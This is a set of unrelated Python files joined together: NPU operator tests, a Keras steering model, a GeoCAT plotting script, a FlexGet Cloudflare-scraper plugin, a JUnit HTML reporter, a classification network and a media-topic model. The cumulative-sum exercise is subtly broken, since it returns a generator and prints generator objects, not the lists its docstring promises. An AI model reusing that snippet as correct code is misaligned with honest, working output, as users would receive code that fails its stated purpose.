cpu_output = cpu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
npu_output = npu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_float32_out(self, device):
def cpu_op_exec_out(input1, input2, input3, scalar, input4):
output = input4
torch.addcdiv(input1, input2, input3, value=scalar, out=output)
output = output.numpy()
return output
def npu_op_exec_out(input1, input2, input3, scalar, input4):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
output = input4.to("npu")
torch.addcdiv(input1, input2, input3, value=scalar, out=output)
output = output.to("cpu")
output = output.numpy()
return output
npu_input1, npu_input2, npu_input3 = self.generate_data(1, 100, (5, 3), np.float32)
scalar = self.generate_scalar(1, 10)
npu_input4 = self.generate_single_data(1, 100, (5, 3), np.float32)
cpu_output = cpu_op_exec_out(npu_input1, npu_input2, npu_input3, scalar, npu_input4)
npu_output = npu_op_exec_out(npu_input1, npu_input2, npu_input3, scalar, npu_input4)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_float32_broadcast(self, device):
def cpu_op_exec(input1, input2, input3, scalar):
output = torch.addcdiv(input1, input2, input3, value=scalar)
return output
def npu_op_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
output = torch.addcdiv(input1, input2, input3, value=scalar)
output = output.to("cpu")
return output
npu_input1 = self.generate_single_data(1, 100, (5, 3, 1), np.float32)
npu_input2 = self.generate_single_data(1, 100, (5, 1, 5), np.float32)
npu_input3 = self.generate_single_data(1, 100, (1, 1, 5), np.float32)
scalar = self.generate_scalar(1, 10)
cpu_output = cpu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
npu_output = npu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
# self.assertEqual(cpu_output, npu_output)
self.assertRtolEqual(cpu_output, npu_output)
def test_addcdiv_inp_contiguous_float32(self, device):
def cpu_op_inp_contiguous_exec(input1, input2, input3, scalar):
input1.addcdiv_(input2, input3, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_contiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
input1.addcdiv_(input2, input3, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1, npu_input2, npu_input3 = self.generate_data(1, 100, (5, 3), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_contiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_contiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_inp_input1_noncontiguous_float32(self, device):
def cpu_op_inp_input1_noncontiguous_exec(input1, input2, input3, scalar):
input1_strided = input1.as_strided([2, 2], [1, 2], 2)
input1_strided.addcdiv_(input2, input3, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_input1_noncontiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
input1_as_strided = input1.as_strided([2, 2], [1, 2], 2)
input1_as_strided.addcdiv_(input2, input3, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1 = self.generate_single_data(1, 100, (4, 3), np.float32)
npu_input2 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input3 = self.generate_single_data(1, 100, (2, 2), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_input1_noncontiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_input1_noncontiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_inp_input2_noncontiguous_float32(self, device):
def cpu_op_inp_input2_noncontiguous_exec(input1, input2, input3, scalar):
input2_strided = input2.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2_strided, input3, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_input2_noncontiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input3 = input3.to("npu")
input2 = input2.to("npu")
input2_as_strided = input2.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2_as_strided, input3, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input2 = self.generate_single_data(1, 100, (4, 3), np.float32)
npu_input3 = self.generate_single_data(1, 100, (2, 2), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_input2_noncontiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_input2_noncontiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_inp_input3_noncontiguous_float32(self, device):
def cpu_op_inp_input3_noncontiguous_exec(input1, input2, input3, scalar):
input3_strided = input3.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2, input3_strided, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_input3_noncontiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
input3_as_strided = input3.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2, input3_as_strided, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input2 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input3 = self.generate_single_data(1, 100, (4, 3), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_input3_noncontiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_input3_noncontiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
instantiate_device_type_tests(TestAddcdiv, globals(), except_for="cpu")
if __name__ == "__main__":
run_tests()
|
import csv
import cv2
import numpy as np
import tensorflow as tf
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Dropout, Cropping2D
from keras.layers.convolutional import Convolution2D
from keras.layers.pooling import MaxPooling2D
def data_import(Filename):
# reading file content
print('Reading file')
samples = []
with open(Filename) as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
return samples
def Extract_data(samples):
print('Loading the data')
images = []
angles = []
# looping for each line in the csv file
for batch_sample in samples:
# importing the images for each image and its flip
for i in range(3):
#read the image
name = 'data/IMG/'+batch_sample[i].split('/')[-1]
image = cv2.imread(name)
measurment = float(batch_sample[3])
images.append(image)
#import angle measurment for center image and its flip
if i == 0 :
angles.append(measurment)
image_flipped = cv2.flip(cv2.imread(name),1)
images.append(image_flipped)
angles.append(measurment*-1.0)
#import angle measurment for left image
if i == 1 :
angles.append(measurment+0.2)
#import angle measurment for right image
if i == 2 :
angles.append(measurment-0.2)
# convert the array to be numpy array
X_train = np.array(images)
y_train = np.array(angles)
return X_train, y_train
def model_design(X_train, y_train):
print('Creating the model')
# model design
model = Sequential()
model.add(Lambda(lambda x: x/255 - 0.5, input_shape=(160, 320, 3)))
model.add(Cropping2D(cropping=((70,25), (0,0))))
model.add(Convolution2D(24, 5, 5, subsample=(2,2), activation='relu'))
model.add(Convolution2D(36, 5, 5, subsample=(2,2), activation='relu'))
model.add(Convolution2D(48, 5, 5, subsample=(2,2), activation='relu'))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(Flatten())
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(50, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
# compiling the model
model.compile(loss= 'mse', optimizer= 'adam')
model.fit(X_train, y_train, nb_epoch=2, validation_split=0.2, shuffle=True)
# save the model
model.save('model.h5')
# the file name that contain the data
Filename = 'data/driving_log.csv'
#import file content
samples = data_import(Filename)
#read images and measurments
X_train, y_train = Extract_data(samples)
#create and train the model
model_design(X_train, y_train)
|
"""
Write a Python program to compute cumulative sum of numbers of a given list.
Note: Cumulative sum = sum of itself + all previous numbers in the said list.
Sample Output:
[10, 30, 60, 100, 150, 210, 217]
[1, 3, 6, 10, 15]
[0, 1, 3, 6, 10, 15]
"""
def cummulative_sum(num_lists):
return (sum(num_lists[:i+1]) for i in range(len(num_lists)))
print(cummulative_sum([10, 20, 30, 40, 50, 60, 7]))
print(cummulative_sum([1, 2, 3, 4, 5]))
print(cummulative_sum([0, 1, 2, 3, 4, 5])) |
"""
NCL_panel_41.py
===============
This script illustrates the following concepts:
- Paneling six plots on a page
- Adding a common title to paneled plots using a custom method
- Adding left, center, and right subtitles to a panel plot
- Using a different color scheme to follow `best practices <https://geocat-examples.readthedocs.io/en/latest/gallery/Colors/CB_Temperature.html#sphx-glr-gallery-colors-cb-temperature-py>`_ for visualizations
See following URLs to see the reproduced NCL plot & script:
- Original NCL script: https://www.ncl.ucar.edu/Applications/Scripts/panel_41.ncl
- Original NCL plot: https://www.ncl.ucar.edu/Applications/Images/panel_41_lg.png
"""
##############################################################################
# Import packages:
import cartopy.crs as ccrs
import cartopy.feature as cfeature
from cartopy.mpl.gridliner import LongitudeFormatter, LatitudeFormatter
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as mcolors
import numpy as np
import xarray as xr
import geocat.datafiles as gdf
import geocat.viz.util as gvutil
##############################################################################
# Helper function to convert date into 03-Oct 2000 (00H) format
def convert_date(date):
months = [
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sept', 'Oct',
'Nov', 'Dec'
]
year = date[:4]
month = months[int(date[5:7]) - 1]
day = date[8:10]
hour = date[11:13]
return day + "-" + month + " " + year + " (" + hour + "H)"
##############################################################################
# Helper function to create and format subplots
def add_axes(fig, grid_space):
ax = fig.add_subplot(grid_space, projection=ccrs.PlateCarree())
# Add land to the subplot
ax.add_feature(cfeature.LAND,
facecolor="none",
edgecolor='black',
linewidths=0.5,
zorder=2)
# Usa geocat.viz.util convenience function to set axes parameters
gvutil.set_axes_limits_and_ticks(ax,
ylim=(-90, 90),
xlim=(-180, 180),
xticks=np.arange(-180, 181, 30),
yticks=np.arange(-90, 91, 30))
# Use geocat.viz.util convenience function to add minor and major tick lines
gvutil.add_major_minor_ticks(ax, labelsize=8)
# Use geocat.viz.util convenience function to make plots look like NCL
# plots by using latitude, longitude tick labels
gvutil.add_lat_lon_ticklabels(ax)
# Remove the degree symbol from tick labels
ax.yaxis.set_major_formatter(LatitudeFormatter(degree_symbol=''))
ax.xaxis.set_major_formatter(LongitudeFormatter(degree_symbol=''))
return ax
##############################################################################
# Read in data:
# Open a netCDF data file using xarray default engine and load the data into xarrays
ds = xr.open_dataset(gdf.get("netcdf_files/rectilinear_grid_2D.nc"))
# Read variables
tsurf = ds.tsurf # surface temperature in K
date = tsurf.time
##############################################################################
# Plot
# Generate figure (set its size (width, height) in inches)
fig = plt.figure(figsize=(12, 11.2), constrained_layout=True)
# Create gridspec to hold six subplots
grid = fig.add_gridspec(ncols=2, nrows=3)
# Add the axes
ax1 = add_axes(fig, grid[0, 0])
ax2 = add_axes(fig, grid[0, 1])
ax3 = add_axes(fig, grid[1, 0])
ax4 = add_axes(fig, grid[1, 1])
ax5 = add_axes(fig, grid[2, 0])
ax6 = add_axes(fig, grid[2, 1])
# Set plot index list
plot_idxs = [0, 6, 18, 24, 30, 36]
# Set contour levels
levels = np.arange(220, 316, 1)
# Set colormap
cmap = plt.get_cmap('magma')
for i, axes in enumerate([ax1, ax2, ax3, ax4, ax5, ax6]):
dataset = tsurf[plot_idxs[i], :, :]
# Contourf plot data
contour = axes.contourf(dataset.lon,
dataset.lat,
dataset.data,
vmin=250,
vmax=310,
cmap=cmap,
levels=levels)
# Add lower text box
axes.text(0.98,
0.05,
convert_date(str(dataset.time.data)),
horizontalalignment='right',
transform=axes.transAxes,
fontsize=8,
bbox=dict(boxstyle='square, pad=0.25',
facecolor='white',
edgecolor='gray'),
zorder=5)
# Set colorbounds of norm
colorbounds = np.arange(249, 311, 1)
# Use cmap to create a norm and mappable for colorbar to be correctly plotted
norm = mcolors.BoundaryNorm(colorbounds, cmap.N)
mappable = cm.ScalarMappable(norm=norm, cmap=cmap)
# Add colorbar for all six plots
fig.colorbar(mappable,
ax=[ax1, ax2, ax3, ax4, ax5, ax6],
ticks=colorbounds[3:-1:3],
drawedges=True,
orientation='horizontal',
shrink=0.82,
pad=0.01,
aspect=35,
extendfrac='auto',
extendrect=True)
# Add figure titles
fig.suptitle("rectilinear_grid_2D.nc", fontsize=22, fontweight='bold')
ax1.set_title("surface temperature", loc="left", fontsize=16, y=1.05)
ax2.set_title("degK", loc="right", fontsize=15, y=1.05)
# Show plot
plt.show()
|
from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin, validator
from flexget.event import event
log = logging.getLogger('cfscraper')
class CFScraper(object):
"""
Plugin that enables scraping of cloudflare protected sites.
Example::
cfscraper: yes
"""
def validator(self):
return validator.factory('boolean')
@plugin.priority(253)
def on_task_start(self, task, config):
try:
import cfscrape
except ImportError as e:
log.debug('Error importing cfscrape: %s' % e)
raise plugin.DependencyError('cfscraper', 'cfscrape', 'cfscrape module required. ImportError: %s' % e)
if config is True:
task.requests = cfscrape.create_scraper(task.requests)
@event('plugin.register')
def register_plugin():
plugin.register(CFScraper, 'cfscraper', api_ver=2)
|
"""
Parse a junit report file into a family of objects
"""
import xml.etree.ElementTree as ET
import collections
from junit2htmlreport import tag
import os
import uuid
class AnchorBase(object):
"""
Base class that can generate a unique anchor name.
"""
def __init__(self):
self._anchor = None
def anchor(self):
"""
Generate a html anchor name
:return:
"""
if not self._anchor:
self._anchor = str(uuid.uuid4())
return self._anchor
class Class(AnchorBase):
"""
A namespace for a test
"""
def __init__(self):
super(Class, self).__init__()
self.name = None
self.cases = list()
def html(self):
"""
Render this test class as html
:return:
"""
cases = [x.html() for x in self.cases]
return """
<hr size="2"/>
<a name="{anchor}">
<div class="testclass">
<div>Test Class: {name}</div>
<div class="testcases">
{cases}
</div>
</div>
</a>
""".format(anchor=self.anchor(),
name=tag.text(self.name),
count=len(cases),
cases="".join(cases))
class Case(AnchorBase):
"""
Test cases
"""
def __init__(self):
super(Case, self).__init__()
self.failure = None
self.failure_msg = None
self.skipped = False
self.skipped_msg = None
self.stderr = None
self.stdout = None
self.duration = 0
self.name = None
self.testclass = None
def failed(self):
"""
Return True if this test failed
:return:
"""
return self.failure is not None
def html(self):
"""
Render this test case as HTML
:return:
"""
failure = ""
skipped = None
stdout = tag.text(self.stdout)
stderr = tag.text(self.stderr)
if self.skipped:
skipped = """
<hr size="1"/>
<div class="skipped"><b>Skipped: {msg}</b><br/>
<pre>{skip}</pre>
</div>
""".format(msg=tag.text(self.skipped_msg),
skip=tag.text(self.skipped))
if self.failed():
failure = """
<hr size="1"/>
<div class="failure"><b>Failed: {msg}</b><br/>
<pre>{fail}</pre>
</div>
""".format(msg=tag.text(self.failure_msg),
fail=tag.text(self.failure))
return """
<a name="{anchor}">
<div class="testcase">
<div class="details">
<span class="testname"><b>{testname}</b></span><br/>
<span class="testclassname">{testclassname}</span><br/>
<span class="duration">Time Taken: {duration}s</span>
</div>
{skipped}
{failure}
<hr size="1"/>
<div class="stdout"><i>Stdout</i><br/>
<pre>{stdout}</pre></div>
<hr size="1"/>
<div class="stderr"><i>Stderr</i><br/>
<pre>{stderr}</pre></div>
</div>
</a>
""".format(anchor=self.anchor(),
testname=self.name,
testclassname=self.testclass.name,
duration=self.duration,
failure=failure,
skipped=skipped,
stdout=stdout,
stderr=stderr)
class Suite(object):
"""
Contains test cases (usually only one suite per report)
"""
def __init__(self):
self.name = None
self.duration = 0
self.classes = collections.OrderedDict()
def __contains__(self, item):
"""
Return True if the given test classname is part of this test suite
:param item:
:return:
"""
return item in self.classes
def __getitem__(self, item):
"""
Return the given test class object
:param item:
:return:
"""
return self.classes[item]
def __setitem__(self, key, value):
"""
Add a test class
:param key:
:param value:
:return:
"""
self.classes[key] = value
def all(self):
"""
Return all testcases
:return:
"""
tests = list()
for testclass in self.classes:
tests.extend(self.classes[testclass].cases)
return tests
def failed(self):
"""
Return all the failed testcases
:return:
"""
return [test for test in self.all() if test.failed()]
def skipped(self):
"""
Return all skipped testcases
:return:
"""
return [test for test in self.all() if test.skipped]
def passed(self):
"""
Return all the passing testcases
:return:
"""
return [test for test in self.all() if not test.failed()]
def toc(self):
"""
Return a html table of contents
:return:
"""
fails = ""
skips = ""
if len(self.failed()):
faillist = list()
for failure in self.failed():
faillist.append(
"""
<li>
<a href="#{anchor}">{name}</a>
</li>
""".format(anchor=failure.anchor(),
name=tag.text(
failure.testclass.name + failure.name)))
fails = """
<li>Failures
<ul>{faillist}</ul>
</li>
""".format(faillist="".join(faillist))
if len(self.skipped()):
skiplist = list()
for skipped in self.skipped():
skiplist.append(
"""
<li>
<a href="#{anchor}">{name}</a>
</li>
""".format(anchor=skipped.anchor(),
name=tag.text(
skipped.testclass.name + skipped.name)))
skips = """
<li>Skipped
<ul>{skiplist}</ul>
</li>
""".format(skiplist="".join(skiplist))
classlist = list()
for classname in self.classes:
testclass = self.classes[classname]
cases = list()
for testcase in testclass.cases:
if "pkcs11" in testcase.name:
assert True
cases.append(
"""
<li>
<a href="#{anchor}">{name}</a>
</li>
""".format(anchor=testcase.anchor(),
name=tag.text(testcase.name)))
classlist.append("""
<li>
<a href="#{anchor}">{name}</a>
<ul>
{cases}
</ul>
</li>
""".format(anchor=testclass.anchor(),
name=testclass.name,
cases="".join(cases)))
return """
<ul>
{failed}
{skips}
<li>All Test Classes
<ul>{classlist}</ul>
</li>
</ul>
""".format(failed=fails,
skips=skips,
classlist="".join(classlist))
def html(self):
"""
Render this as html.
:return:
"""
classes = list()
for classname in self.classes:
classes.append(self.classes[classname].html())
return """
<div class="testsuite">
<h2>Test Suite: {name}</h2>
<table>
<tr><th align="left">Duration</th><td align="right">{duration} sec</td></tr>
<tr><th align="left">Test Cases</th><td align="right">{count}</td></tr>
<tr><th align="left">Failures</th><td align="right">{fails}</td></tr>
</table>
<a name="toc"></a>
<h2>Results Index</h2>
{toc}
<hr size="2"/>
<h2>Test Results</h2>
<div class="testclasses">
{classes}
</div>
</div>
""".format(name=tag.text(self.name),
duration=self.duration,
toc=self.toc(),
classes="".join(classes),
count=len(self.all()),
fails=len(self.failed()))
class Junit(object):
"""
Parse a single junit xml report
"""
def __init__(self, filename):
"""
Parse the file
:param filename:
:return:
"""
self.filename = filename
self.tree = ET.parse(filename)
self.suite = None
self.process()
self.css = "report.css"
def get_css(self):
"""
Return the content of the css file
:return:
"""
thisdir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(thisdir, self.css), "rb") as cssfile:
return cssfile.read()
def process(self):
"""
populate the report from the xml
:return:
"""
root = self.tree.getroot()
assert root.tag == "testsuite"
self.suite = Suite()
self.suite.name = root.attrib["name"]
self.suite.duration = float(root.attrib.get("time", '0'))
for testcase in root:
assert testcase.tag == "testcase"
if testcase.attrib["classname"] not in self.suite:
testclass = Class()
testclass.name = testcase.attrib["classname"]
if not testclass.name:
testclass.name = "no-classname-set"
self.suite[testclass.name] = testclass
newcase = Case()
newcase.name = testcase.attrib["name"]
newcase.testclass = testclass
newcase.duration = float(testcase.attrib["time"])
testclass.cases.append(newcase)
# does this test case have any children?
for child in testcase:
if child.tag == "skipped":
newcase.skipped = child.text
if "message" in child.attrib:
newcase.skipped_msg = child.attrib["message"]
elif child.tag == "system-out":
newcase.stdout = child.text
elif child.tag == "system-err":
newcase.stderr = child.text
elif child.tag == "failure":
newcase.failure = child.text
if "message" in child.attrib:
newcase.failure_msg = child.attrib["message"]
elif child.tag == "error":
newcase.failure = child.text
if "message" in child.attrib:
newcase.failure_msg = child.attrib["message"]
def html(self):
"""
Render the test suite as a HTML report with links to errors first.
:return:
"""
cssdata = self.get_css()
return """
<html>
<head>
<title>{name} - Junit Test Report</title>
<style type="text/css">
{css}
</style>
</head>
<body>
<h1>Test Report</h1>
{suite}
</body>
</html>
""".format(name=self.suite.name,
css=cssdata,
suite=self.suite.html())
|
from conda_mirror.convert_environments import _convert_environments
import shutil
import yaml
def test_environment_conversion():
shutil.rmtree("test/repo", ignore_errors=True)
_convert_environments("test/environments", "test/repo", "http://test.com")
with open("test/repo/linux-64/igwn-py37.yaml","rt") as f:
env = yaml.safe_load(f)
assert len(env["channels"]) == 2
assert env["channels"][0] == "http://test.com"
assert env["channels"][1] == "conda-forge"
with open("test/repo/linux-64/igwn-py38.yaml","rt") as f:
env = yaml.safe_load(f)
assert len(env["channels"]) == 2
assert env["channels"][0] == "http://test.com"
assert env["channels"][1] == "conda-forge" |
import torch
import torch.nn as nn
import torch.nn.functional as F
from backbone import (res32_cifar, res50, res10)
from modules import GAP, FCNorm, Identity, LWS
import copy
import numpy as np
import cv2
import os
class Network(nn.Module):
def __init__(self, cfg, mode="train", num_classes=1000):
super(Network, self).__init__()
pretrain = (
True
if mode == "train"
and cfg.RESUME_MODEL == ""
and cfg.BACKBONE.PRETRAINED_MODEL != ""
else False
)
self.num_classes = num_classes
self.cfg = cfg
self.backbone = eval(self.cfg.BACKBONE.TYPE)(
self.cfg,
pretrain=pretrain,
pretrained_model=cfg.BACKBONE.PRETRAINED_MODEL,
last_layer_stride=2,
)
self.mode = mode
self.module = self._get_module()
self.classifier = self._get_classifer()
if cfg.NETWORK.PRETRAINED and os.path.isfile(cfg.NETWORK.PRETRAINED_MODEL):
try:
self.load_model(cfg.NETWORK.PRETRAINED_MODEL)
except:
raise ValueError('network pretrained model error')
def forward(self, x, **kwargs):
if "feature_flag" in kwargs or "feature_cb" in kwargs or "feature_rb" in kwargs:
return self.extract_feature(x, **kwargs)
elif "classifier_flag" in kwargs:
return self.classifier(x)
elif 'feature_maps_flag' in kwargs:
return self.extract_feature_maps(x)
elif 'layer' in kwargs and 'index' in kwargs:
if kwargs['layer'] in ['layer1', 'layer2', 'layer3']:
x = self.backbone.forward(x, index=kwargs['index'], layer=kwargs['layer'], coef=kwargs['coef'])
else:
x = self.backbone(x)
x = self.module(x)
if kwargs['layer'] == 'pool':
x = kwargs['coef']*x+(1-kwargs['coef'])*x[kwargs['index']]
x = x.view(x.shape[0], -1)
x = self.classifier(x)
if kwargs['layer'] == 'fc':
x = kwargs['coef']*x + (1-kwargs['coef'])*x[kwargs['index']]
return x
x = self.backbone(x)
x = self.module(x)
x = x.view(x.shape[0], -1)
x = self.classifier(x)
return x
def get_backbone_layer_info(self):
if "cifar" in self.cfg.BACKBONE.TYPE:
layers = 3
blocks_info = [5, 5, 5]
elif 'res10' in self.cfg.BACKBONE.TYPE:
layers = 4
blocks_info = [1, 1, 1, 1]
else:
layers = 4
blocks_info = [3, 4, 6, 3]
return layers, blocks_info
def extract_feature(self, x, **kwargs):
x = self.backbone(x)
x = self.module(x)
x = x.view(x.shape[0], -1)
return x
def extract_feature_maps(self, x):
x = self.backbone(x)
return x
def freeze_backbone(self):
print("Freezing backbone .......")
for p in self.backbone.parameters():
p.requires_grad = False
def load_backbone_model(self, backbone_path=""):
self.backbone.load_model(backbone_path)
print("Backbone model has been loaded...")
def load_model(self, model_path, tau_norm=False, tau=1):
pretrain_dict = torch.load(
model_path, map_location="cuda"
)
pretrain_dict = pretrain_dict['state_dict'] if 'state_dict' in pretrain_dict else pretrain_dict
model_dict = self.state_dict()
from collections import OrderedDict
new_dict = OrderedDict()
for k, v in pretrain_dict.items():
if k.startswith("module"):
k = k[7:]
if k == 'classifier.weight' and tau_norm:
print('*-*'*30)
print('Using tau-normalization')
print('*-*'*30)
v = v / torch.pow(torch.norm(v, 2, 1, keepdim=True), tau)
new_dict[k] = v
if self.mode == 'train' and self.cfg.CLASSIFIER.TYPE == "cRT":
print('*-*'*30)
print('Using cRT')
print('*-*'*30)
for k in new_dict.keys():
if 'classifier' in k: print(k)
new_dict.pop('classifier.weight')
try:
new_dict.pop('classifier.bias')
except:
pass
if self.mode=='train' and self.cfg.CLASSIFIER.TYPE == "LWS":
print('*-*'*30)
print('Using LWS')
print('*-*'*30)
bias_flag = self.cfg.CLASSIFIER.BIAS
for k in new_dict.keys():
if 'classifier' in k: print(k)
class_weight = new_dict.pop('classifier.weight')
new_dict['classifier.fc.weight'] = class_weight
if bias_flag:
class_bias = new_dict.pop('classifier.bias')
new_dict['classifier.fc.bias'] = class_bias
model_dict.update(new_dict)
self.load_state_dict(model_dict)
if self.mode == 'train' and self.cfg.CLASSIFIER.TYPE in ['cRT', 'LWS']:
self.freeze_backbone()
print("All model has been loaded...")
def get_feature_length(self):
if "cifar" in self.cfg.BACKBONE.TYPE:
num_features = 64
elif 'res10' in self.cfg.BACKBONE.TYPE:
num_features = 512
else:
num_features = 2048
return num_features
def _get_module(self):
module_type = self.cfg.MODULE.TYPE
if module_type == "GAP":
module = GAP()
elif module_type == "Identity":
module= Identity()
else:
raise NotImplementedError
return module
def _get_classifer(self):
bias_flag = self.cfg.CLASSIFIER.BIAS
num_features = self.get_feature_length()
if self.cfg.CLASSIFIER.TYPE == "FCNorm":
classifier = FCNorm(num_features, self.num_classes)
elif self.cfg.CLASSIFIER.TYPE in ["FC", "cRT"]:
classifier = nn.Linear(num_features, self.num_classes, bias=bias_flag)
elif self.cfg.CLASSIFIER.TYPE == "LWS":
classifier = LWS(num_features, self.num_classes, bias=bias_flag)
else:
raise NotImplementedError
return classifier
def cam_params_reset(self):
self.classifier_weights = np.squeeze(list(self.classifier.parameters())[0].detach().cpu().numpy())
def get_CAM_with_groundtruth(self, image_idxs, dataset, label_list, size):
ret_cam = []
size_upsample = size
for i in range(len(image_idxs)):
idx = image_idxs[i]
label = label_list[idx]
self.eval()
with torch.no_grad():
img = dataset._get_trans_image(idx)
feature_conv = self.forward(img.to('cuda'), feature_maps_flag=True).detach().cpu().numpy()
b, c, h, w = feature_conv.shape
assert b == 1
feature_conv = feature_conv.reshape(c, h*w)
cam = self.classifier_weights[label].dot(feature_conv)
del img
del feature_conv
cam = cam.reshape(h, w)
cam = cam - np.min(cam)
cam_img = cam / np.max(cam)
cam_img = np.uint8(255*cam_img)
ret_cam.append(cv2.resize(cam_img, size_upsample))
return ret_cam
|
# -*- coding: utf-8 -*-
from sqlalchemy import Column, ForeignKey, Integer, String, Float, func, desc
from itertools import groupby
from ..app import db
class Topic(db.Model):
"""
Primary topic for an article.
"""
__tablename__ = "topics"
id = Column(Integer, primary_key=True)
name = Column(String(150), index=True, nullable=False, unique=True)
group = Column(String(100))
# TODO: delete this
analysis_nature_id = Column(Integer, ForeignKey('analysis_natures.id'), index=True, nullable=True)
def __repr__(self):
return "<Topic name='%s'>" % (self.name.encode('utf-8'),)
def __str__(self):
return self.name.encode('utf-8')
def __unicode__(self):
return self.name
def sort_key(self):
try:
# sort ("10. Foo", "10.2 Bar") by the code
parts = (self.group.split(' ', 1)[0], self.name.split(' ', 1)[0])
return [int(k.replace('.', '')) for k in parts]
except:
return (self.group, self.name)
@classmethod
def for_select_widget(cls, topics):
choices = []
topics.sort(key=cls.sort_key)
for group, items in groupby(topics, lambda t: t.group):
choices.append((group or 'General', [[str(t.id), t.name] for t in items]))
return choices
@classmethod
def all(cls):
return sorted(cls.query.order_by(cls.name).all(), key=cls.sort_key)
@classmethod
def create_defaults(self):
text = """
1|Voter education & registration
1|Election fraud
1|Election funding
1|Election logistics
1|Election results
1|Opinion polls
1|Political party campaigning (only when no other code applies)
1|Political party manifesto outlines / analyses
1|Political party coalitions & co-operation
1|Political party politics (internal &/or external)
1|Political violence & intimidation
1|Service delivery
1|Education
1|Environment
1|Health
1|HIV & Aids
1|Corruption (govt, political party, private sector)
1|Crime
1|Justice system
1|Housing
1|Land
1|Gender
1|Children
1|Poverty
1|Race / Racism
1|Refugees / Migration
1|Affirmative action
1|Diplomacy
1|International politics
1|Personalities and profiles
1|Demonstrations / Protests
1|Development
1|Disaster
1|Economics
1|Arts / Culture / Entertainment / Religion
1|Human rights
1|Labour
1|Media
1|Science
1|Sport
1|Disabilities
1|Other (Last Resort)
2|1.1. Adoption - international local and other related issues|1. Adoption
2|2.1. Child Labour - exploitation of children for work as cheap labour|2. Child Abuse
2|2.2. Child Pornography|2. Child Abuse
2|2.3. General when codes below don't apply|2. Child Abuse
2|2.4. Physical Abuse-beatings, burnings|2. Child Abuse
2|2.5. Mental & Emotional Abuse-verbal and consistently making derogatory remarks|2. Child Abuse
2|2.6. Child Prostitution-use of children for sex work|2. Child Abuse
2|2.7. Child Abduction/ Trafficking/ Slavery - abducting a child for sexual purposes or slavery|2. Child Abuse
2|2.8. Kidnapping- taking a child ifor ransom purposes|2. Child Abuse
2|2.9. Child Rape-non-consensual includes penetrative and non-penetrative sex with a minor includes statutory rape|2. Child Abuse
2|2.10. Sexual Abuse- the abuse of boys and girls and included indecent assault and sodomy|2. Child Abuse
2|2.11. Child Neglect-failure to adequately attend to a child's needs|2. Child Abuse
2|2.12. Maintenance and child support-bills, divorce cases|2. Child Abuse
